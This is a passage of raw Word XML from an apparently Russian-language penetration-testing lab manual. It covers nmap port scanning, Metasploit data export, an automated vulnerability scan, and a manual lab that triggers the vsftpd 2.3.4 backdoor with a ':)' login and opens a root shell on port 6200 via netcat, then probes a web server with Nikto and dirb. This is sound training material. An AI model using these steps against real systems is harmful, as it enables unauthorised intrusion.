      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00347A12">
        <w:t>sS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00347A12">
        <w:t xml:space="preserve"> -p1-10000 &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00347A12">
        <w:t>адрес_цели</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00347A12">
        <w:t>&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="00E11CC9">
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="064FDEBC" wp14:editId="41208E3D">
            <wp:extent cx="5935980" cy="3543300"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="33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 rotWithShape="1">
                    <a:blip r:embed="rId45"/>
                    <a:srcRect b="10800"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5940115" cy="354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A12" w:rsidRPr="00EF49CB" w:rsidRDefault="00347A12" w:rsidP="00E11CC9">
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="009D31EE">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/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 задачи №2:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00347A12" w:rsidP="00EF49C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 xml:space="preserve">Шаг 1. Экспорт данных из </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00347A12">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00347A12">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00347A12">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Framework</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00347A12">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Чтобы экспортировать собранные данные примените команду </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>db_export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&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>имя_файла</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="00E11CC9">
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="326CBDBE" wp14:editId="10B7E10B">
            <wp:extent cx="4292600" cy="1778000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="30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 rotWithShape="1">
                    <a:blip r:embed="rId46"/>
                    <a:srcRect b="8430"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4288457" cy="177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49CB">
        <w:rPr>
          <w:b/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00347A12" w:rsidRPr="00347A12" w:rsidRDefault="00347A12" w:rsidP="00347A12">
      <w:r w:rsidRPr="00347A12">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Запустите </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00347A12">
        <w:t>LibreOffice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00347A12">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00347A12">
        <w:t>Calc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00347A12">
        <w:t xml:space="preserve"> (Глав</w:t>
      </w:r>
      <w:r>
        <w:t>ное меню</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve"> → О</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>стальные приложения </w:t>
      </w:r>
      <w:r w:rsidRPr="00347A12">
        <w:t xml:space="preserve">→ Офис → </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00347A12">
        <w:t>LibreOffice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00347A12">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00347A12">
        <w:t>Calc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00347A12">
        <w:t xml:space="preserve">). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00347A12" w:rsidRDefault="00347A12" w:rsidP="00347A12">
      <w:r w:rsidRPr="00347A12">
        <w:t xml:space="preserve">Импортируйте данные в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00347A12">
        <w:t>LibreOffice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00347A12">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00347A12">
        <w:t>Calc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00347A12">
        <w:t>. Вначале в настройках необходимо включить эксперименталь</w:t>
      </w:r>
      <w:r>
        <w:t>ные функции (Сервис → Параметры </w:t>
      </w:r>
      <w:r w:rsidRPr="00347A12">
        <w:t>→ Расширенные возможности</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00347A12">
        <w:t xml:space="preserve"> → В</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00347A12">
        <w:t>ключить экспериментальные возможности). Далее потребуется импорт</w:t>
      </w:r>
      <w:r>
        <w:t>ировать данные из файла (Данные </w:t>
      </w:r>
      <w:r w:rsidRPr="00347A12">
        <w:t xml:space="preserve">→ Источник XML). Там для импорта выберите ветку </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00347A12">
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00347A12">
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00347A12">
        <w:t>hosts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00347A12">
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00347A12">
        <w:t>host</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00347A12">
        <w:t xml:space="preserve">  → </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00347A12">
        <w:t>services</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00347A12">
        <w:t xml:space="preserve"> →  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00347A12">
        <w:t>service</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00347A12">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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873558B" wp14:editId="5BA59434">
            <wp:extent cx="5940115" cy="2743200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="33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7A12" w:rsidRPr="00EF49CB" w:rsidRDefault="00347A12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</w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="00EF49CB">
      <w:pPr>
        <w:jc w:val="center"/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 задачи №3:</w:t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</w:t>
      </w:r>
      <w:r w:rsidR="005B2EC9">
        <w:rPr>
          <w:color w:val="111111"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Добавить задачу «Поиск уязвимостей».</w:t>
      </w:r>
      <w:r w:rsidR="005B2EC9" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Чтобы начать поиск уязвимостей щелкните левой кнопкой мыши по кнопке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Задачи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в поле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Поиск уязвимостей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и нажмите на кнопку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Новое сканирование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6F4FCC8A" wp14:editId="6366B1AF">
            <wp:extent cx="5934075" cy="1866900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="29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2. </w:t>
      </w:r>
      <w:r w:rsidR="005B2EC9">
        <w:rPr>
          <w:color w:val="111111"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Настроить сканирование. </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Настройки, необходимые для запуска поиска уязвимостей, находятся на вкладке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Базовые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, где оператор задает цели поиска уязвимостей (IP-адреса проверяемых компьютеров, сетей или подсетей) и выбирает политику сканирования (набор правил сканирования): быстрое сканирование, сканирование веб-приложений, либо полное сканирование. Цели поиска уязвимостей можно задавать несколькими способами: вручную, импортировать цели из активов или загрузить из файла.</w:t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Вначале идет выбор политики сканирования. По умолчанию </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>установлена</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">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Быстрая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. Если необходимо сменить политику сканирования, нажмите на кнопку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Быстрая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и выберите одну из базовых политик.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1247267" wp14:editId="5E45B7D3">
            <wp:extent cx="5455211" cy="3337560"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="27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49"/>
                    <a:srcRect b="1351"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5458778" cy="333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Далее происходит выбор цели. Для загрузки целей сканирования из файла подготовьте соответствующий список целей поиска уязвимостей в формате ТХТ, где одна строка должна содержать только один IP-адрес компьютера, сети или подсети. Затем нажмите кнопку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Импорт целей из файла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и в открывшемся окне выберите файл с импортируемым списком, далее нажмите кнопку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Открыть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. Перечень целей сканирования появится в поле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Цели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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="422A6842" wp14:editId="6FEE8716">
            <wp:extent cx="4985138" cy="2796540"/>
            <wp:effectExtent l="0" t="0" r="6350" b="3810"/>
            <wp:docPr id="348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 rotWithShape="1">
                    <a:blip r:embed="rId50"/>
                    <a:srcRect b="7936"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4991666" cy="280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Дополнительные настройки сканирования расположены на вкладках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Выявление хостов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,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Сканирование портов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,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Расширенные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. </w:t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На вкладке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Задача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задайте имя и описание в соответствующие пустые поля. Если поля оставить пустыми, они будут заполнены автоматически. Нажмите кнопку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Создать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. На вкладке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Задачи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появится новая задача.</w:t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  <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Шаг 3.</w:t>
      </w:r>
      <w:r w:rsidR="005B2EC9" w:rsidRPr="005B2EC9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005B2EC9" w:rsidRPr="005B2EC9">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Запустить сканирование и посмотреть результаты.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> После запуска будет отражена информация о статусе выполнения задачи. </w:t>
      </w:r>
      <w:r w:rsidRPr="005B2EC9">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">После завершения сканирования в разделе </w:t>
      </w:r>
      <w:r w:rsidR="00401AC4" w:rsidRPr="005B2EC9">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="005B2EC9">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Уязвимости</w:t>
      </w:r>
      <w:r w:rsidR="00401AC4" w:rsidRPr="005B2EC9">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="005B2EC9">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> появятся данные об обнаруженных уязвимостях, которые будут сгруппированы в таблицу.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="005B2E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CA40BFF" wp14:editId="5C6CF2A0">
            <wp:extent cx="5158740" cy="2768384"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="30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3430" cy="2770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color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc107507608"/>
      <w:bookmarkStart w:id="16" w:name="_Toc107513727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3.2.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Ручной поиск уязвимостей</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="00EF49CB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2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изучение принципа идентификац</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ии уя</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>звимости, опираясь на информацию о версии программного обеспечения.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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Задание: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подключиться к FTP-серверу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 и определить версию программного обеспечения;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используя информацию о версии, найти в интернете данные об имеющихся уязвимостях;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провести эксплуатацию обнаруженных уязвимостей в FTP-сервере;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выполнить те же шаги для веб-сервера (80 порт). Для определения версии сервера использовать NMAP.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Подключиться к FTP-серверу, узнать версию </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>vsftpd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2681CDA" wp14:editId="2F27A007">
            <wp:extent cx="5935980" cy="1272540"/>
            <wp:effectExtent l="0" t="0" r="7620" b="3810"/>
            <wp:docPr id="33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 rotWithShape="1">
                    <a:blip r:embed="rId52"/>
                    <a:srcRect b="69616"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5940115" cy="127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2. Найти информацию об уязвимостях для </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> v.2.3.4.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2E029AC0" wp14:editId="34F77D49">
            <wp:extent cx="5849942" cy="3090334"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="32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 rotWithShape="1">
                    <a:blip r:embed="rId53"/>
                    <a:srcRect b="27349"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5852472" cy="309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3. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Указать в качестве логина любую комбинацию, к примеру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reader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:)</w:t>
      </w:r>
      <w:r w:rsidR="00401AC4">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="005B2EC9">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, а пароля – любое </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>слово.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Прервать ожидание комбинацией </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Ctrl+C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E6D2499" wp14:editId="1C21EEFB">
            <wp:extent cx="5940115" cy="1485900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="31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4. Подключиться к </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>шелу</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> на порте 6200 с помощью команды </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Проверить наличие </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">-прав после подключения к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D14A9A2" wp14:editId="3CBC792E">
            <wp:extent cx="5940115" cy="800100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="30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5. Определить версию </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Apache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, установленного на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2, при помощи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nmap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468CE32" wp14:editId="63BB2CA7">
            <wp:extent cx="4991100" cy="533400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="25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6. Найти уязвимости для данной версии </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Apache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0" distB="0" distL="0" distR="0" wp14:anchorId="3CF81FDF" wp14:editId="15EB939E">
            <wp:extent cx="4522464" cy="3215812"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="24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6509" cy="3218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7. При помощи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nmap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(NSE), получить информацию об уязвимостях сайта, размещенного на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C6462B0" wp14:editId="322B029C">
            <wp:extent cx="5935980" cy="3413760"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="360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 rotWithShape="1">
                    <a:blip r:embed="rId58"/>
                    <a:srcRect b="8196"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5940115" cy="341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8. При помощи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Nikto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, получить информацию об уязвимостях сайта, размещенного на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4CBA538" wp14:editId="038E12DD">
            <wp:extent cx="5940115" cy="3771900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="25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9. При помощи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dirb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, получить информацию о директориях сайта, размещенного на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mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="1ADDC6C6" wp14:editId="491F69A7">
                <wp:extent cx="5940115" cy="3771900"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="231" name="Группа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115" cy="3771900"/>
                          <a:chOff x="152400" y="152400"/>
                          <a:chExt cx="5943600" cy="3771900"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="5" name="Shape 5"/>
                          <pic:cNvPicPr preferRelativeResize="0"/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId6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94360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Прямоугольник 1"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="431325" y="2823200"/>
